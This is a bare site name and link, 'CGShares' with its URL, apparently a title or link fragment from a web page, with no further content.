CGShares https://cgshares.com